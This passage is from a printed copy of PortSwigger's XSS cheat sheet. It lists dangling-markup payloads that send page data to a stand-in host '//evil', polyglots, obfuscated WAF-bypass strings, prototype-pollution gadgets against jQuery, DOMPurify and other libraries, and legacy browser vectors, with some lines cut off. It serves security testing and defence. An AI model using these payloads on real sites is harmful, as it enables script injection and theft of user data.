Link

Iframe src

Copy

Link

Embed src

<embed src="//evil?

Copy

Link

Use textarea to consume markup and post to external site

<form><button formaction=//evil>XSS</button><textarea name=x>

Copy

Link

Pass markup data through window.name using form target

<button form=x>XSS</button><form id=x action=//evil target='

Copy

https://portswigger.net/web-security/cross-site-scripting/cheat-sheet 56/75
5/24/25, 5:42 PM Cross-Site Scripting (XSS) Cheat Sheet - 2025 Edition | Web Security Academy
Link

Pass markup data through window.name using base target

<a href=http://subdomain1.portswigger-labs.net/dangling_markup/name.html><font size=100 color=red>You must clic

me</font></a><base target="

Copy

Link

Pass markup data through window.name using formtarget

<form><input type=submit value="Click me" formaction=http://subdomain1.portswigger-

labs.net/dangling_markup/name.html formtarget="

Copy

Link

Using base href to pass data

<a href=abc style="width:100%;height:100%;position:absolute;font-size:1000px;">xss<base href="//evil/

Copy

Link

Using embed window name to pass data from the page

<embed src=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="

Copy

Link

Using iframe window name to pass data from the page

<iframe src=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="

Copy

Link

Using object window name to pass data from the page

<object data=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="

Copy

Link

https://portswigger.net/web-security/cross-site-scripting/cheat-sheet 57/75
5/24/25, 5:42 PM Cross-Site Scripting (XSS) Cheat Sheet - 2025 Edition | Web Security Academy

Using frame window name to pass data from the page

<frameset><frame src=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="

Copy

Link

Overwrite type attribute with image in hidden inputs

<input type=hidden type=image src="//evil?

Copy

Link

Polyglots

Polyglot payload 1

javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'

Copy

Link

Polyglot payload 2

javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \"
onmouseover=/*<svg/*/onload=alert()//>

Copy

Link

Polyglot payload 3

javascript:/*--></title></style></textarea></script></xmp>
<details/open/ontoggle='+/`/+/"/+/onmouseover=1/+/[*/[]/+alert(/@PortSwiggerRes/)//'>

Copy

Link

WAF bypass global objects

XSS into a JavaScript string: string concatenation (window)

';window['ale'+'rt'](window['doc'+'ument']['dom'+'ain']);//

Copy

Link

XSS into a JavaScript string: string concatenation (self)

https://portswigger.net/web-security/cross-site-scripting/cheat-sheet 58/75
5/24/25, 5:42 PM Cross-Site Scripting (XSS) Cheat Sheet - 2025 Edition | Web Security Academy
';self['ale'+'rt'](self['doc'+'ument']['dom'+'ain']);//

Copy

Link

XSS into a JavaScript string: string concatenation (this)

';this['ale'+'rt'](this['doc'+'ument']['dom'+'ain']);//

Copy

Link

XSS into a JavaScript string: string concatenation (top)

';top['ale'+'rt'](top['doc'+'ument']['dom'+'ain']);//

Copy

Link

XSS into a JavaScript string: string concatenation (parent)

';parent['ale'+'rt'](parent['doc'+'ument']['dom'+'ain']);//

Copy

Link

XSS into a JavaScript string: string concatenation (frames)

';frames['ale'+'rt'](frames['doc'+'ument']['dom'+'ain']);//

Copy

Link

XSS into a JavaScript string: string concatenation (globalThis)

';globalThis['ale'+'rt'](globalThis['doc'+'ument']['dom'+'ain']);//

Copy

Link

XSS into a JavaScript string: comment syntax (window)

';window[/*foo*/'alert'/*bar*/](window[/*foo*/'document'/*bar*/]['domain']);//

Copy

Link

XSS into a JavaScript string: comment syntax (self)

';self[/*foo*/'alert'/*bar*/](self[/*foo*/'document'/*bar*/]['domain']);//

Copy

Link

https://portswigger.net/web-security/cross-site-scripting/cheat-sheet 59/75
5/24/25, 5:42 PM Cross-Site Scripting (XSS) Cheat Sheet - 2025 Edition | Web Security Academy

XSS into a JavaScript string: comment syntax (this)

';this[/*foo*/'alert'/*bar*/](this[/*foo*/'document'/*bar*/]['domain']);//

Copy

Link

XSS into a JavaScript string: comment syntax (top)

';top[/*foo*/'alert'/*bar*/](top[/*foo*/'document'/*bar*/]['domain']);//

Copy

Link

XSS into a JavaScript string: comment syntax (parent)

';parent[/*foo*/'alert'/*bar*/](parent[/*foo*/'document'/*bar*/]['domain']);//

Copy

Link

XSS into a JavaScript string: comment syntax (frames)

';frames[/*foo*/'alert'/*bar*/](frames[/*foo*/'document'/*bar*/]['domain']);//

Copy

Link

XSS into a JavaScript string: comment syntax (globalThis)

';globalThis[/*foo*/'alert'/*bar*/](globalThis[/*foo*/'document'/*bar*/]['domain']);//

Copy

Link

XSS into a JavaScript string: hex escape sequence (window)

';window['\x61\x6c\x65\x72\x74'](window['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e']);//

Copy

Link

XSS into a JavaScript string: hex escape sequence (self)

';self['\x61\x6c\x65\x72\x74'](self['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e']);//

Copy

Link

XSS into a JavaScript string: hex escape sequence (this)

';this['\x61\x6c\x65\x72\x74'](this['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e']);//

Copy

https://portswigger.net/web-security/cross-site-scripting/cheat-sheet 60/75
5/24/25, 5:42 PM Cross-Site Scripting (XSS) Cheat Sheet - 2025 Edition | Web Security Academy
Link

XSS into a JavaScript string: hex escape sequence (top)

';top['\x61\x6c\x65\x72\x74'](top['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e']);//

Copy

Link

XSS into a JavaScript string: hex escape sequence (parent)

';parent['\x61\x6c\x65\x72\x74'](parent['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e']);//

Copy

Link

XSS into a JavaScript string: hex escape sequence (frames)

';frames['\x61\x6c\x65\x72\x74'](frames['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e']);//

Copy

Link

XSS into a JavaScript string: hex escape sequence (globalThis)

';globalThis['\x61\x6c\x65\x72\x74'](globalThis['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e']

Copy

Link

XSS into a JavaScript string: hex escape sequence and base64 encoded string (window)

';window['\x65\x76\x61\x6c']('window["\x61\x6c\x65\x72\x74"](window["\x61\x74\x6f\x62"]("WFNT"))');//

Copy

Link

XSS into a JavaScript string: hex escape sequence and base64 encoded string (self)

';self['\x65\x76\x61\x6c']('self["\x61\x6c\x65\x72\x74"](self["\x61\x74\x6f\x62"]("WFNT"))');//

Copy

Link

XSS into a JavaScript string: hex escape sequence and base64 encoded string (this)

';this['\x65\x76\x61\x6c']('this["\x61\x6c\x65\x72\x74"](this["\x61\x74\x6f\x62"]("WFNT"))');//

Copy

Link

XSS into a JavaScript string: hex escape sequence and base64 encoded string (top)

';top['\x65\x76\x61\x6c']('top["\x61\x6c\x65\x72\x74"](top["\x61\x74\x6f\x62"]("WFNT"))');//

https://portswigger.net/web-security/cross-site-scripting/cheat-sheet 61/75
5/24/25, 5:42 PM Cross-Site Scripting (XSS) Cheat Sheet - 2025 Edition | Web Security Academy

Copy

Link

XSS into a JavaScript string: hex escape sequence and base64 encoded string (parent)

';parent['\x65\x76\x61\x6c']('parent["\x61\x6c\x65\x72\x74"](parent["\x61\x74\x6f\x62"]("WFNT"))');//

Copy

Link

XSS into a JavaScript string: hex escape sequence and base64 encoded string (frames)

';frames['\x65\x76\x61\x6c']('frames["\x61\x6c\x65\x72\x74"](frames["\x61\x74\x6f\x62"]("WFNT"))');//

Copy

Link

XSS into a JavaScript string: hex escape sequence and base64 encoded string (globalThis)

';globalThis['\x65\x76\x61\x6c']('globalThis["\x61\x6c\x65\x72\x74"](globalThis["\x61\x74\x6f\x62"]("WFNT"))');

Copy

Link

XSS into a JavaScript string: octal escape sequence (window)

';window['\141\154\145\162\164']('\130\123\123');//

Copy

Link

XSS into a JavaScript string: octal escape sequence (self)

';self['\141\154\145\162\164']('\130\123\123');//

Copy

Link

XSS into a JavaScript string: octal escape sequence (this)

';this['\141\154\145\162\164']('\130\123\123');//

Copy

Link

XSS into a JavaScript string: octal escape sequence (top)

';top['\141\154\145\162\164']('\130\123\123');//

Copy

Link

https://portswigger.net/web-security/cross-site-scripting/cheat-sheet 62/75
5/24/25, 5:42 PM Cross-Site Scripting (XSS) Cheat Sheet - 2025 Edition | Web Security Academy
XSS into a JavaScript string: octal escape sequence (parent)

';parent['\141\154\145\162\164']('\130\123\123');//

Copy

Link

XSS into a JavaScript string: octal escape sequence (frames)

';frames['\141\154\145\162\164']('\130\123\123');//

Copy

Link

XSS into a JavaScript string: octal escape sequence (globalThis)

';globalThis['\141\154\145\162\164']('\130\123\123');//

Copy

Link

XSS into a JavaScript string: unicode escape (window)

';window['\u{0061}\u{006c}\u{0065}\u{0072}\u{0074}']('\u{0058}\u{0053}\u{0053}');//

Copy

Link

XSS into a JavaScript string: unicode escape (self)

';self['\u{0061}\u{006c}\u{0065}\u{0072}\u{0074}']('\u{0058}\u{0053}\u{0053}');//

Copy

Link

XSS into a JavaScript string: unicode escape (this)

';this['\u{0061}\u{006c}\u{0065}\u{0072}\u{0074}']('\u{0058}\u{0053}\u{0053}');//

Copy

Link

XSS into a JavaScript string: unicode escape (top)

';top['\u{0061}\u{006c}\u{0065}\u{0072}\u{0074}']('\u{0058}\u{0053}\u{0053}');//

Copy

Link

https://portswigger.net/web-security/cross-site-scripting/cheat-sheet 63/75
5/24/25, 5:42 PM Cross-Site Scripting (XSS) Cheat Sheet - 2025 Edition | Web Security Academy

XSS into a JavaScript string: unicode escape (parent)

';parent['\u{0061}\u{006c}\u{0065}\u{0072}\u{0074}']('\u{0058}\u{0053}\u{0053}');//

Copy

Link

XSS into a JavaScript string: unicode escape (frames)

';frames['\u{0061}\u{006c}\u{0065}\u{0072}\u{0074}']('\u{0058}\u{0053}\u{0053}');//

Copy

Link

XSS into a JavaScript string: unicode escape (globalThis)

';globalThis['\u{0061}\u{006c}\u{0065}\u{0072}\u{0074}']('\u{0058}\u{0053}\u{0053}');//

Copy

Link

XSS into a JavaScript string: RegExp source property (window)

';window[/al/.source+/ert/.source](/XSS/.source);//

Copy

Link

XSS into a JavaScript string: RegExp source property (self)

';self[/al/.source+/ert/.source](/XSS/.source);//

Copy

Link

XSS into a JavaScript string: RegExp source property (this)

';this[/al/.source+/ert/.source](/XSS/.source);//

Copy

Link

XSS into a JavaScript string: RegExp source property (top)

';top[/al/.source+/ert/.source](/XSS/.source);//

Copy

Link

XSS into a JavaScript string: RegExp source property (parent)

';parent[/al/.source+/ert/.source](/XSS/.source);//

Copy

https://portswigger.net/web-security/cross-site-scripting/cheat-sheet 64/75
5/24/25, 5:42 PM Cross-Site Scripting (XSS) Cheat Sheet - 2025 Edition | Web Security Academy
Link

XSS into a JavaScript string: RegExp source property (frames)

';frames[/al/.source+/ert/.source](/XSS/.source);//

Copy

Link

XSS into a JavaScript string: RegExp source property (globalThis)

';globalThis[/al/.source+/ert/.source](/XSS/.source);//

Copy

Link

XSS into a JavaScript string: Hieroglyphy/JSFuck (window)

';window[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+
[+!![]]);//

Copy

Link

XSS into a JavaScript string: Hieroglyphy/JSFuck (self)

';self[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[]
[]]);//

Copy

Link

XSS into a JavaScript string: Hieroglyphy/JSFuck (this)

';this[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[]
[]]);//

Copy

Link

XSS into a JavaScript string: Hieroglyphy/JSFuck (top)

';top[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])
[]]);//

Copy

Link

XSS into a JavaScript string: Hieroglyphy/JSFuck (parent)

';parent[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+
[+!![]]);//

Copy

Link

https://portswigger.net/web-security/cross-site-scripting/cheat-sheet 65/75
5/24/25, 5:42 PM Cross-Site Scripting (XSS) Cheat Sheet - 2025 Edition | Web Security Academy

XSS into a JavaScript string: Hieroglyphy/JSFuck (frames)

';frames[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+
[+!![]]);//

Copy

Link

XSS into a JavaScript string: Hieroglyphy/JSFuck (globalThis)

';globalThis[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((
[])[+!![]]);//

Copy

Link

Content types
This section lists content-types that can be used for XSS with the X-Content-Type-Options: nosniff header active.

Content-Type Browsers PoC

text/html <script>alert(document.domain)</script>

application/xhtml+xml <x:script xmlns:x="http://www.w3.org/1999/xhtml">alert(document.domain)</x:script>

application/xml <x:script xmlns:x="http://www.w3.org/1999/xhtml">alert(document.domain)</x:script>

text/xml <x:script xmlns:x="http://www.w3.org/1999/xhtml">alert(document.domain)</x:script>

image/svg+xml <x:script xmlns:x="http://www.w3.org/1999/xhtml">alert(document.domain)</x:script>

text/xsl <x:script xmlns:x="http://www.w3.org/1999/xhtml">alert(document.domain)</x:script>

application/vnd.wap.xhtml+xml <x:script xmlns:x="http://www.w3.org/1999/xhtml">alert(document.domain)</x:script>

text/rdf <x:script xmlns:x="http://www.w3.org/1999/xhtml">alert(document.domain)</x:script>

application/rdf+xml <x:script xmlns:x="http://www.w3.org/1999/xhtml">alert(document.domain)</x:script>

application/mathml+xml <x:script xmlns:x="http://www.w3.org/1999/xhtml">alert(document.domain)</x:script>

text/vtt <script>alert(document.domain)</script>

text/cache-manifest <script>alert(document.domain)</script>

Response content types

This section lists content-types that can be used for XSS when you can inject into the content-type header.

Content-Type Browsers PoC

text/plain; x=x, text/html, foobar <script>alert(document.domain)</script>

text/html(xxx <script>alert(document.domain)</script>

text/html xxx <script>alert(document.domain)</script>

text/html, xxx <script>alert(document.domain)</script>

text/html; xxx <script>alert(document.domain)</script>

Impossible labs

To find out what these are for, please refer to Documenting the impossible: Unexploitable XSS labs.

Title Description Length Closest vector

limit
Basic context, WAF blocks This lab captures the scenario when you can't use an open tag followed by an alphanumeric N/A N/A
<[a-zA-Z] character. Sometimes you can solve this problem by bypassing the WAF entirely, but what
about when that's not an option? Certain versions of .NET have this behaviour, and it's only
known to be exploitable in old IE with <%tag.
Script based injection but We often encounter this situation in the wild: you have an injection inside a JavaScript N/A N/A
quotes, forward slash and variable and can inject angle brackets, but quotes and forward/backslashes are escaped so

https://portswigger.net/web-security/cross-site-scripting/cheat-sheet 66/75
5/24/25, 5:42 PM Cross-Site Scripting (XSS) Cheat Sheet - 2025 Edition | Web Security Academy
backslash are escaped you can't simply close the script block.

The closest we've got to solving this is when you have multiple injection points. The first within
a script based context and the second in HTML.
innerHTML context but no You have a site that processes the query string and URL decodes the parameters but splits N/A N/A
equals allowed on the equals then assigns to innerHTML. In this context <script> doesn't work and we can't
use = to create an event.

Basic context length limit This lab's injection occurs within the basic HTML context but has a length limitation of 15. 15 <q oncut=alert``
Filedescriptor came up with a vector that could execute JavaScript in 16 characters: <q
oncut=alert`` but can you beat it?
Attribute context length The context of this lab inside an attribute with a length limitation of 14 characters. We came 14 "oncut=alert``
limit up with a vector that executes JavaScript in 15 characters:"oncut=alert``+ the plus is a trailing
space. Do you think you can beat it?
Basic context length limit, It's all well and good executing JavaScript but if all you can do is call alert what use is that? In 19 <q
arbitrary code this lab we demonstrate the shortest possible way to execute arbitrary code. oncut=eval(name

Attribute context length Again calling alert proves you can call a function but we created another lab to find the 17 See link
limit arbitrary code shortest possible attribute based injection with arbitrary JavaScript.
Injection occurs inside a We received a request from twitter about this next lab. It occurs within a frameset but before a N/A N/A
frameset but before the body tag with equals filtered. You would think you could inject a closing frameset followed by a
body script block but that would be too easy.
Injection occurs inside The injection occurs within a single quoted string and the challenge is to execute arbitrary N/A N/A
single quoted string, only code using the charset a-zA-Z0-9'+.`. Luan Herrera solved this lab in an amazing way, you
characters a-z0-9+'.` are can view the solution in the following post.
allowed.
Injection occurs inside The double quote is encoded, the challenge is to find a way to execute XSS within a quoted N/A N/A
double quoted src attribute src attribute.
of a image element

Prototype pollution

Library Payload Author Version Fingerprint

Wistia Embedded <script> William All return (typeof wistiaEmbeds !== 'undefined')
Video Object.prototype.innerHTML = Bowling versions
'<img/src/onerror=alert(1)>';
</script>

$(x).off jQuery <script> Sergey All return (typeof $ !== 'undefined' && typeof $.fn !== 'unde
Object.prototype.preventDefault='x'; Bobrov versions && typeof $.fn.jquery !== 'undefined')
Object.prototype.handleObj='x';
Object.prototype.delegateTarget='<im
g/src/onerror=alert(1)>';
/* No extra code needed for jQuery 1
& 2 */$(document).off('foobar');
</script>

$(html) jQuery <script> Sergey All return (typeof $ !== 'undefined' && typeof $.fn !== 'unde
Object.prototype.div=['1','<img src Bobrov versions && typeof $.fn.jquery !== 'undefined')
onerror=alert(1)>','1']
</script><script>
$('<div x="x"></div>')
</script>

$.get jQuery <script> Michał >= 3.0.0 return (typeof $ !== 'undefined' && typeof $.fn !== 'unde
Object.prototype.url = Bentkowski && typeof $.fn.jquery !== 'undefined')
['data:,alert(1)//'];
Object.prototype.dataType =
'script';
</script>
<script>
$.get('https://google.com/');
$.post('https://google.com/');
</script>

https://portswigger.net/web-security/cross-site-scripting/cheat-sheet 67/75
5/24/25, 5:42 PM Cross-Site Scripting (XSS) Cheat Sheet - 2025 Edition | Web Security Academy

$.getScript jQuery <script> s1r1us >= 3.4.0 return (typeof $ !== 'undefined' && typeof $.fn !== 'unde
Object.prototype.src = && typeof $.fn.jquery !== 'undefined')
['data:,alert(1)//']
</script>
<script>
$.getScript('https://google.com/')
</script>

$.getScript jQuery <script> s1r1us 3.0.0 - return (typeof $ !== 'undefined' && typeof $.fn !== 'unde
Object.prototype.url = 3.3.1 && typeof $.fn.jquery !== 'undefined')
'data:,alert(1)//'
</script>
<script>
$.getScript('https://google.com/')
</script>

Google <script> s1r1us return (typeof recaptcha !== 'undefined')

reCAPTCHA Object.prototype.srcdoc=
['<script>alert(1)<\/script>']
</script>
<div class="g-recaptcha" data-
sitekey="your-site-key"/>

Twitter Universal <script> Sergey return (typeof twq !== 'undefined' && typeof twq.version
Website Tag Object.prototype.hif = Bobrov 'undefined')
['javascript:alert(document.domain)'
];
</script>

Tealium Universal <script> Sergey return (typeof utag !== 'undefined' && typeof utag.id !==
Tag Object.prototype.attrs = {src:1}; Bobrov 'undefined')
Object.prototype.src='https://portsw
igger-labs.net/xss/xss.js'
</script>

Akamai <script>Object.prototype.BOOMR = 1; s1r1us return (typeof BOOMR !== 'undefined')

Boomerang Object.prototype.url='https://portsw
igger-labs.net/xss/xss.js'</script>

Lodash <script> Alex <= return (typeof _ !== 'undefined' && typeof _.template !=
Object.prototype.sourceURL = Brasetvik 4.17.15 'undefined' && typeof _.VERSION !== 'undefined')
'\u2028\u2029alert(1)'
</script>
<script>
_.template('test')
</script>

sanitize-html <script> Michał return (typeof sanitizeHtml !== 'undefined')

Object.prototype['*'] = ['onload'] Bentkowski
</script>
<script>
document.write(sanitizeHtml('<iframe
onload=alert(1)>'))
</script>

js-xss <script> Michał return (typeof filterXSS !== 'undefined')

Object.prototype.whiteList = {img: Bentkowski
['onerror', 'src']}
</script>
<script>
document.write(filterXSS('<img src
onerror=alert(1)>'))
</script>

DOMPurify <script> Michał <= 2.0.12 return (typeof DOMPurify !== 'undefined')
Object.prototype.ALLOWED_ATTR = Bentkowski
['onerror', 'src']
</script>

https://portswigger.net/web-security/cross-site-scripting/cheat-sheet 68/75
5/24/25, 5:42 PM Cross-Site Scripting (XSS) Cheat Sheet - 2025 Edition | Web Security Academy
<script>
document.write(DOMPurify.sanitize('<
img src onerror=alert(1)>'))
</script>

DOMPurify <script> Michał <= 2.0.12 return (typeof DOMPurify !== 'undefined')
Object.prototype.documentMode = 9 Bentkowski
</script>

Closure <script> Michał return (typeof goog !== 'undefined' && typeof goog.bas
const html = '<img src Bentkowski !== 'undefined')
onerror=alert(1)>';
const sanitizer = new
goog.html.sanitizer.HtmlSanitizer();
const sanitized =
sanitizer.sanitize(html);
const node =
goog.dom.safeHtmlToNode(sanitized);

document.body.append(node);
</script>

Closure <script> Michał return (typeof goog !== 'undefined' && typeof goog.bas
Object.prototype.CLOSURE_BASE_PATH = Bentkowski !== 'undefined')
'data:,alert(1)//';
</script>

Marionette.js / <script> Sergey return (typeof Marionette !== 'undefined') return (typeof
Backbone.js Object.prototype.tagName = 'img' Bobrov Backbone !== 'undefined' && typeof Backbone.VERSIO
Object.prototype.src = ['x:x'] 'undefined')
Object.prototype.onerror =
['alert(1)']
</script>
<script>
(function() {
var View = Mn.View.extend({template:
'#template-layout'});
var App =
Mn.Application.extend({region:
'#app', onStart: function()
{this.showView(new View());}});
var app = new App();
app.start();
})();
</script>
<div id="template-layout" type="x-
template/underscore">xxx</div>

Adobe Dynamic <script> Sergey return (typeof _satellite !== 'undefined')

Tag Management Object.prototype.src='data:,alert(1) Bobrov
//'
</script>

Embedly Cards <script> Guilherme return (typeof window.embedly !== 'undefined')

Object.prototype.onload = 'alert(1)' Keerok
</script>

Segment <script> Sergey return (typeof analytics !== 'undefined' && typeof
Analytics.js Object.prototype.script = Bobrov analytics.SNIPPET_VERSION !== 'undefined')
[1,'<img/src/onerror=alert(1)>','<im
g/src/onerror=alert(2)>']
</script>

Knockout.js <strong data-bind="text:'hello'"> Michał

</strong> Bentkowski
<script>
Object.prototype[4]="a':1,

https://portswigger.net/web-security/cross-site-scripting/cheat-sheet 69/75
5/24/25, 5:42 PM Cross-Site Scripting (XSS) Cheat Sheet - 2025 Edition | Web Security Academy
[alert(1)]:1,'b";Object.prototype[5]
=',';
</script><script>
ko.applyBindings({})
</script>

$(x).on jQuery <script> Andrei All return (typeof $ !== 'undefined' && typeof $.fn !== 'unde
Object.prototype.on = 'click'; Nicolaiciuc versions && typeof $.fn.jquery !== 'undefined')
$('body').on('click', function() {
alert('Injected Event'); });
$('body').trigger('click');
</script>

Classic vectors (XSS crypt)

Image src with JavaScript protocol

Copy

Link

Body background with JavaScript protocol

Copy

Link

Iframe data urls no longer work as modern browsers use a null origin

<iframe src="data:text/html,<img src=1 onerror=alert(document.domain)>">

Copy

Link

VBScript protocol used to work in IE

<a href="vbscript:MsgBox+1">XSS</a> <a href="#" onclick="vbs:Msgbox+1">XSS</a> <a href="#"

onclick="VBS:Msgbox+1">XSS</a> <a href="#" onclick="vbscript:Msgbox+1">XSS</a> <a href="#"
onclick="VBSCRIPT:Msgbox+1">XSS</a> <a href="#" language=vbs onclick="vbscript:Msgbox+1">XSS</a>

Copy

Link

JScript compact was a minimal version of JS that wasn't widely used in IE

<a href="#" onclick="jscript.compact:alert(1);">test</a> <a href="#" onclick="JSCRIPT.COMPACT:alert(1);">test</

Copy

Link

JScript.Encode allows encoded JavaScript

<a href=# language="JScript.Encode" onclick="#@~^CAAAAA==C^+.D`8#mgIAAA==^#~@">XSS</a> <a href=#

onclick="JScript.Encode:#@~^CAAAAA==C^+.D`8#mgIAAA==^#~@">XSS</a>

Copy

Link

VBScript.Encoded allows encoded VBScript

https://portswigger.net/web-security/cross-site-scripting/cheat-sheet 70/75
5/24/25, 5:42 PM Cross-Site Scripting (XSS) Cheat Sheet - 2025 Edition | Web Security Academy
<iframe onload=VBScript.Encode:#@~^CAAAAA==\ko$K6,FoQIAAA==^#~@> <iframe language=VBScript.Encode
onload=#@~^CAAAAA==\ko$K6,FoQIAAA==^#~@>

Copy

Link

JavaScript entities used to work in Netscape Navigator

Copy

Link

JavaScript stylesheets used to be supported by Netscape Navigator

<link href="xss.js" rel=stylesheet type="text/javascript">

Copy

Link

Button used to consume markup

<form><button name=x formaction=x><b>stealme

Copy

Link

IE9 select elements and plaintext used to consume markup

<form action=x><button>XSS</button><select name=x><option><plaintext><script>token="supersecret"</script>

Copy

Link

XBL Firefox only <= 2

<div style="-moz-binding:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)"> <div style="\-\mo\z-

binding:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)"> <div style="-moz-bindin\67:url(//businessinfo.co.uk/lab
s/xbl/xbl.xml#xss)"> <div style="-moz-bindin\67:url(//businessinfo.co.uk/lab s/xbl/xbl.xml#xss)">

Copy

Link

XBL also worked in FF3.5 using data urls

<img src="blah" style="-moz-binding: url(data:text/xml;charset=utf-

8,%3C%3Fxml%20version%3D%221.0%22%3F%3E%3Cbindings%20xmlns%3D%22
http%3A//www.mozilla.org/xbl%22%3E%3Cbinding%20id%3D%22loader%22%3E%3Cimplementation%3E%3Cconstructor%3E%3C%21%
TA%5Bvar%20url%20%3D%20%22alert.js
%22%3B%20var%20scr%20%3D%20document.createElement%28%22script%22%29%3B%20scr.setAttribute%28%22src%22%2Curl%29%
var%20bodyElement%20%3D%20
document.getElementsByTagName%28%22html%22%29.item%280%29%3B%20bodyElement.appendChild%28scr%29%3B%20%5D%5D%3E%
nstructor%3E%3C/implementation%3E%3C/ binding%3E%3C/bindings%3E)" />

Copy

Link

CSS expressions <=IE7

<div style=xss:expression(alert(1))> <div style=xss:expression(1)-alert(1)> <div style=xss:expressio\6e(alert(1

https://portswigger.net/web-security/cross-site-scripting/cheat-sheet 71/75
5/24/25, 5:42 PM Cross-Site Scripting (XSS) Cheat Sheet - 2025 Edition | Web Security Academy

Copy

Link

In quirks mode IE allowed you to use = instead of :

<div style=xss=expression(alert(1))> <div style="color&#x3dred">test</div>

Copy

Link

Behaviors for older modes of IE

<a style="behavior:url(#default#AnchorClick);" folder="javascript:alert(1)">XSS</a>

Copy

Link

Older versions of IE supported event handlers in functions

Copy

Link

GreyMagic HTML+time exploit (no longer works even in 5 docmode)

<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t"

implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<img src=1 onerror=alert(1)>"> </BODY>
</HTML>

Copy

Link

Firefox allows NULLS after &

<a href="javascriptjavascript:alert(1)">Firefox</a>

Copy

Link

Firefox allows NULLs inside named entities

<a href="javascript&colon;alert(1)">Firefox</a>

Copy

Link

Firefox allows NULL characters inside opening comments

<iframe/onload=alert(1)>"> --> <iframe/onload=alert(1)>"> -->

Copy

Link

https://portswigger.net/web-security/cross-site-scripting/cheat-sheet 72/75
5/24/25, 5:42 PM Cross-Site Scripting (XSS) Cheat Sheet - 2025 Edition | Web Security Academy

Safari used to allow any tag to have a onload event inside SVG

Copy

Link

Isindex using src attribute

<isindex type=image src="//evil?

Copy

Link

Isindex using submit

<isindex type=submit style=width:100%;height:100%; value=XSS formaction="//evil?

Copy

Link

Isindex and formaction

<isindex type=submit formaction=javascript:alert(1)>

Copy

Link

Isindex and action

<isindex type=submit action=javascript:alert(1)>

Copy

Link

discard tag and onbegin

Copy

Link

Use element with an external URL

<svg><use href="//subdomain1.portswigger-labs.net/use_element/upload.php#x" /></svg>

Copy

Link

onloadstart event for media elements in Firefox v107 and below

<img src=validimage.png onloadstart=alert(1)>

Copy

Link

onloadend event for media elements in Firefox v107 and below

https://portswigger.net/web-security/cross-site-scripting/cheat-sheet 73/75
5/24/25, 5:42 PM Cross-Site Scripting (XSS) Cheat Sheet - 2025 Edition | Web Security Academy
<input type=image onloadend=alert(1) src=validimage.png>

Copy

Link

onbounce event for marquee element in Firefox v125 and below

<marquee width=1 loop=1 onbounce=alert(1)>XSS</marquee>

Copy

Link

onfinish event for marquee element in Firefox v125 and below

<marquee width=1 loop=1 onfinish=alert(1)>XSS</marquee>

Copy

Link

onstart event for marquee element in Firefox v125 and below

Copy

Link

Assignable protocol with location

Copy

Link

Assignable protocol with anchor

